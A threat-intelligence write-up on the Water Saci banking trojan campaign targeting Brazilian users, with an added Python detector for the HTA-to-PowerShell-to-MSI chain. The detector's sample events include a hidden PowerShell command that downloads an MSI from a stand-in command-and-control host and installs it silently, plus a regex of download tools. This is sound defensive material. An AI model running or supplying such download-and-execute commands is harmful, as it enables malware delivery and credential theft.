Water Saci Banking Trojan
Cybercriminal operations continue to evolve, and the Brazilian threat actor Water Saci has demonstrated a remarkable leap in sophistication. Recent campaigns leverage multi-layered infection chains using HTA files, PDFs, and WhatsApp to propagate a banking trojan, targeting Brazilian users with unprecedented efficiency.
Multi-Format Attack Chain: From PowerShell to Python
The latest wave marks a significant shift in Water Saci's tactics. Previously reliant on PowerShell, the threat actor now employs a Python-based variant that spreads malware in a worm-like fashion via WhatsApp Web.
Key elements of this enhanced attack chain include:
- PDF lures: Victims receive PDF files instructing them to update Adobe Reader by clicking a malicious link.
- HTA files: When executed, these files run Visual Basic Scripts that launch PowerShell commands to fetch payloads, including an MSI installer for the trojan and the Python script responsible for WhatsApp propagation.
This multi-format approach demonstrates how Water Saci has layered its attack mechanisms, likely using AI or automated tools to translate scripts from PowerShell to Python. This increases compatibility, speed, resilience, and maintainability of the malware delivery.
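As an added defender-side example (not code from the original report), the following Python correlates constructed process-creation events to flag the HTA-to-PowerShell-to-MSI step of this chain. The event field names, the sample command lines and the EXAMPLE-C2 host are assumptions made for the demonstration.

```python
"""Detect the HTA -> PowerShell -> MSI/Python download chain in
process-creation telemetry. Added example; events are constructed."""
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events (pid, ppid, image, cmdline).
EVENTS: List[Dict[str, str]] = [
    {"pid": "100", "ppid": "1", "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": "101", "ppid": "100", "image": "AcroRd32.exe",
     "cmdline": "AcroRd32.exe C:\\Users\\u\\Downloads\\atualizacao.pdf"},
    {"pid": "102", "ppid": "100", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Users\\u\\Downloads\\update.hta"},
    {"pid": "103", "ppid": "102", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c Invoke-WebRequest "
                "http://EXAMPLE-C2/loader.msi -OutFile $env:TEMP\\l.msi"},
    {"pid": "104", "ppid": "103", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Users\\u\\AppData\\Local\\Temp\\l.msi /qn"},
    {"pid": "105", "ppid": "100", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process"},  # benign: parent is not mshta
]

# Download cmdlets commonly seen in such stagers, and the payload types the
# report names (MSI installer, Python propagation script).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|downloadfile|downloadstring|\biwr\b|\bcurl\b|\bwget\b", re.I)
PAYLOAD_RE = re.compile(r"\.(msi|py)\b", re.I)

def find_hta_chains(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert per PowerShell process spawned by mshta.exe that
    downloads an MSI/Python payload; severity rises if msiexec follows."""
    by_pid = {e["pid"]: e for e in events}
    children: Dict[str, List[Dict[str, str]]] = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if e["image"].lower() != "powershell.exe" or parent is None:
            continue
        if parent["image"].lower() != "mshta.exe":
            continue
        if not (DOWNLOAD_RE.search(e["cmdline"]) and PAYLOAD_RE.search(e["cmdline"])):
            continue
        msi_follows = any(c["image"].lower() == "msiexec.exe"
                          for c in children.get(e["pid"], []))
        alerts.append({"pid": e["pid"], "hta": parent["cmdline"],
                       "severity": "high" if msi_follows else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_hta_chains(EVENTS):
        print(alert)
```

Only the chain rooted at the mshta.exe parent is reported; the benign PowerShell launched from explorer.exe is ignored.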
MSI Installer & AutoIt-Based Trojan Loader
The MSI installer serves as the delivery mechanism for the banking trojan. Its AutoIt script performs several critical functions:
- Ensures only one instance of the trojan is running by checking for a marker file (executed.dat) and notifying an attacker-controlled server.
- Verifies system language settings (Portuguese-Brazil) before scanning for banking-related files and applications, including Bradesco, Warsaw, Topaz OFD, Sicoob, and Itaú.
- Searches Google Chrome history for visits to major Brazilian banks: Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco.
The loader uses process hollowing and intermediate PE loading via TDA/DMP files to inject the trojan into memory, achieving stealth and persistence. If the trojan process is terminated, it automatically re-injects when the victim accesses a banking site.
Trojan Functionality: Aggressive Reconnaissance & Credential Theft
Water Saci's trojan exhibits advanced capabilities for monitoring, control, and data theft, including:
- Window title monitoring to detect banking or cryptocurrency platforms.
- Forced browser termination to reopen sites under attacker control.
- Host and system reconnaissance through WMI queries.
- Registry modifications for persistence.
- C2 communication for remote control.
- Supported C2 operations include:
  - Sending system information
  - Keyboard and screen capture
  - Simulating mouse activity
  - File operations (upload/download)
  - Window enumeration
  - Creating fake banking overlays
This functionality mirrors LATAM-focused banking trojans like Casbaneiro, reflecting structural and behavioral continuity while employing more advanced delivery mechanisms.
Python-Based WhatsApp Propagation
A notable innovation in the campaign is the Python script that propagates the malware via WhatsApp Web using the Selenium browser automation tool. Evidence suggests Water Saci may have employed large language models or code-translation tools to port the original PowerShell propagation logic to Python. Console outputs even include emojis, highlighting the new script's sophistication.
By exploiting WhatsApp's trust and reach, Water Saci can self-propagate malware at scale, bypassing traditional defenses and rapidly compromising victims.
Conclusion: A New Era of Messaging-Based Cyber Threats
The Water Saci campaign highlights a growing trend: cybercriminals weaponizing legitimate platforms like WhatsApp to deploy complex malware. By combining social engineering, AI-assisted script development, and multi-stage malware delivery, threat actors can maintain persistent banking trojan infections while evading conventional security controls.
This case underscores the need for heightened vigilance, robust endpoint protection, and user awareness, particularly in regions like Brazil, where messaging platforms play a central role in daily communication.